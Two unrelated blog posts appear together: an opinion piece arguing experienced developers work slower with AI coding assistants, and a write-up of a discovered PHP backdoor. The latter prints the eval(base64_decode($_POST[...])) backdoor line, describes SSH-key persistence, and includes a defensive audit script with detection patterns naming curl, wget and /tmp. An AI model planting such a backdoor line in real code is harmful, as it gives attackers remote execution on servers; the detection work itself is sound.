Experienced devs are slower with AI tools. Nobody wants to admit it.



A recent study found that experienced open-source developers were 19% slower while using AI coding assistants. Yet those same developers believed they were 20% faster.

Read it and weep: the disconnect between perception and reality is nearing 40 percentage points.

Why This Should Bother You

This wasn’t just any survey. It compared real task completion times with self-reported productivity. And the senior engineers – the ones we trust to make all the big architectural decisions – were confident about their speed, and wrong.

And the industry is building its entire tooling strategy around the opposite assumption.

The Perception Trap

I have a hypothesis to explain this phenomenon. As a senior dev, a large share of your cognitive load goes to context-switching costs you are not aware of.

You prompt the AI. You read the output. You notice it got the abstraction wrong. You fix it. You re-prompt. You read again. You realize it missed an edge case you would have caught on line three. You fix that too.

Every single step appears to be helping. There is less typing on your part. More code on the screen. More dopamine. But wall-clock time, in total? It takes longer to finish the task.

→ AI output creates an illusion of velocity because characters appear fast
→ Senior devs spend more time reviewing and correcting than they realize
→ The cognitive load of evaluating generated code is real work that doesn’t feel like work

Who Actually Benefits?

This is not meant to be anti-AI. It’s a more nuanced perspective.

AI assistants are genuinely helpful when you are learning a new language or framework. They save you real minutes when you’re writing the boilerplate for the hundredth time. They are a decent starting point when you’re working with an unfamiliar API.

But if you already know the codebase, understand its patterns, and can type as fast as you think, the AI is essentially adding an intermediary layer between your brain and the editor. That intermediary has a cost.

The study indicates that for skilled developers, the cost is about 19%. This is almost a full day per week.

The Industry Doesn’t Want to Hear This

A discussion about these findings drew over 800 comments from experienced developers. Reactions were polarized, but revealing. A lot of senior engineers acknowledged they had sensed this friction, but had assumed they were an outlier.

They were not the outlier. They were the average.

Meanwhile, every company is mandating AI tool adoption. Each job advertisement includes Copilot. Every engineering blog is publishing “how we 10x’d with AI” stories. The incentive structure punishes anyone who says “actually, this is slowing me down.”

Nobody wants to be the person who looks like they can’t adapt. So everybody nods along. 🤷

What I Think We Should Do

Stop treating AI coding assistants as universally beneficial. Start treating them like any other tool — useful in specific contexts, counterproductive in others.

→ Measure actual output, not vibes
→ Let senior engineers opt out without stigma
→ Stop conflating “uses AI tools” with “is a modern developer”

The best developers I know are ruthless about removing friction from their workflow. If a tool becomes a hindrance, they eliminate it. We need to allow them to do so.

I have a question for you: Have you ever turned off Copilot or a similar tool, felt quicker than before, and been too embarrassed to tell your team?


How I Discovered and Deobfuscated a Hidden PHP Backdoor on My Server


As developers and system architects, we often secure our code but neglect the silent threats lurking in old directories or clever obfuscations. Recently, I caught a stealthy PHP backdoor ((random_name).php) embedded in a system.

Instead of just deleting it, I decided to perform a full reverse engineering to understand exactly how it works, how it bypasses scanners, and how it maintains persistence on a server.

Here is a quick summary of what I found during the analysis.

🔍 The Anatomy of the Malware

At first glance, the file was heavily obfuscated using multiple layers of encoding to look like harmless gibberish. However, the core mechanism relied on a classic but dangerous pattern:

PHP:

    // The malicious pattern used to execute hidden code
    eval(base64_decode($_POST['encoded_payload']));

Key Techniques Used by the Attacker:

Layered Obfuscation: The code used deep base64 nesting combined with string manipulation functions to evade signature-based security scanners.

Hidden Tar Extraction: Deep inside the encoded strings, the malware contained a compressed TAR structure. Once triggered, it extracts a full-featured web shell into the server directories.

SSH Persistence: The ultimate goal wasn’t just to execute commands once—the script was designed to inject malicious public keys into the server’s ~/.ssh/authorized_keys file, granting the attacker permanent, direct SSH access without leaving a footprint in the web logs.

🛠️ How to Protect Your System

If you suspect your server has been compromised, simply deleting the .php file might not be enough. You need to:

Check your ~/.ssh/authorized_keys for unauthorized entries.

Audit your system cronjobs to ensure the malware doesn’t have a re-infection script scheduled.

Implement strict file permissions (chmod 644 for files, 755 for directories) and disable dangerous PHP functions like eval(), exec(), and passthru() in your php.ini.
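The detection and remediation steps above, as an added shell example that is not part of the original post or its GitHub repository. It scans a web root for the eval(base64_decode($_POST[...])) pattern described in the anatomy section, diffs ~/.ssh/authorized_keys against an allowlist, flags cron entries that invoke interpreters, downloaders or scratch directories, checks which shell-spawning functions are absent from disable_functions, and lists paths that stray from the 644/755 baseline. Every path, key string and file in the fixture is constructed for the demo; the allowlist location and the function names chosen for disable_functions are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post or its GitHub repository).
# Defender-side checks that follow the post's findings and remediation list.
# All paths, key strings and fixture contents below are constructed for the demo.

# The pattern the post identified: eval() wrapped around base64_decode() of request input.
EVAL_PATTERN='eval[[:space:]]*\([[:space:]]*base64_decode[[:space:]]*\([[:space:]]*\$_(POST|GET|REQUEST|COOKIE)'

# report TEXT: print findings when there are any; exit 0 means "something to look at".
report() { [ -n "$1" ] || return 1; printf '%s\n' "$1"; }

# scan_php_for_eval WEBROOT: PHP files containing the eval/base64_decode pattern.
scan_php_for_eval() {
  hits=$(find "$1" -type f -name '*.php' -exec grep -lE "$EVAL_PATTERN" {} \; 2>/dev/null)
  report "$hits"
}

# unknown_ssh_keys AUTHORIZED_KEYS ALLOWLIST: key lines not present in the allowlist
# (comments and blank lines are skipped; the allowlist holds one full key line each).
unknown_ssh_keys() {
  unknown=$(grep -vE '^[[:space:]]*(#|$)' "$1" | grep -vxF -f "$2")
  report "$unknown"
}

# suspicious_cron_entries CRONDIR: non-comment lines that invoke an interpreter,
# a downloader, base64, or a world-writable scratch directory (re-infection candidates).
suspicious_cron_entries() {
  entries=$(find "$1" -type f -exec grep -HnE '^[^#]*(php|perl|python|curl|wget|base64|/tmp/|/dev/shm/)' {} \; 2>/dev/null)
  report "$entries"
}

# missing_disabled_functions PHP_INI: shell-spawning functions absent from disable_functions.
# eval() is a language construct, not a function, so disable_functions cannot turn it off.
missing_disabled_functions() {
  disabled=$(sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' "$1" | tr -d ' "')
  missing=""
  for fn in exec shell_exec system passthru; do
    case ",$disabled," in
      *",$fn,"*) ;;
      *) missing="$missing $fn" ;;
    esac
  done
  report "${missing# }"
}

# odd_permissions WEBROOT: files not 644 or directories not 755 (the post's baseline).
odd_permissions() {
  odd=$(find "$1" -mindepth 1 \( -type f ! -perm 644 -o -type d ! -perm 755 \) 2>/dev/null)
  report "$odd"
}

# build_fixture: create a constructed sample tree so the demo runs offline; prints its path.
build_fixture() {
  root=$(mktemp -d)
  mkdir -p "$root/www/old" "$root/cron"
  # Constructed sample carrying the same pattern the post found; nothing here is served.
  printf '<?php\neval(base64_decode($_POST["encoded_payload"]));\n' > "$root/www/old/suspect.php"
  printf '<?php\necho "hello";\n' > "$root/www/index.php"
  chmod 755 "$root/www" "$root/www/old"
  chmod 644 "$root/www/old/suspect.php"
  chmod 600 "$root/www/index.php"   # deliberately off-baseline so odd_permissions flags it
  printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERALLOWED admin@laptop\n' > "$root/allowed_keys"
  printf '# constructed authorized_keys\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERALLOWED admin@laptop\nssh-rsa AAAAB3NzaC1yc2EPLACEHOLDERUNKNOWN unknown@nowhere\n' > "$root/authorized_keys"
  printf '# constructed crontab\n0 3 * * * /usr/local/bin/backup.sh\n*/5 * * * * php /tmp/.cache.php\n' > "$root/cron/www-data"
  printf 'expose_php = Off\ndisable_functions = exec,shell_exec\n' > "$root/php.ini"
  printf '%s\n' "$root"
}

# audit_demo: run every check against the fixture and print each section.
audit_demo() {
  root=$(build_fixture)
  echo "== PHP files with the eval/base64_decode pattern =="; scan_php_for_eval "$root/www" || echo "(none)"
  echo "== authorized_keys entries not on the allowlist =="; unknown_ssh_keys "$root/authorized_keys" "$root/allowed_keys" || echo "(none)"
  echo "== cron entries worth a look =="; suspicious_cron_entries "$root/cron" || echo "(none)"
  echo "== functions missing from disable_functions =="; missing_disabled_functions "$root/php.ini" || echo "(none)"
  echo "== paths off the 644/755 baseline =="; odd_permissions "$root/www" || echo "(none)"
  rm -rf "$root"
}
audit_demo
```

Two notes on using this against a real host. disable_functions only covers internal functions, and eval is a language construct, so it cannot be disabled that way; the check therefore looks for exec, shell_exec, system and passthru. And a single grep pattern catches only the literal form shown in the post; a sample that splits the strings, uses a different decoder or builds the function name at runtime will slip past it, so treat a clean scan as a starting point rather than proof of a clean server.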

📖 Read the Full Deep Dive

I have documented the complete step-by-step deobfuscation process, the code breakdown, directory structures, and full remediation steps on GitHub.

👉 See full analysis and source code breakdown here:

https://github.com/KhaiTrang1995/Malware-Analysis-Reports-PHP-Backdoor


Tags: #php #security #devsecops #malware
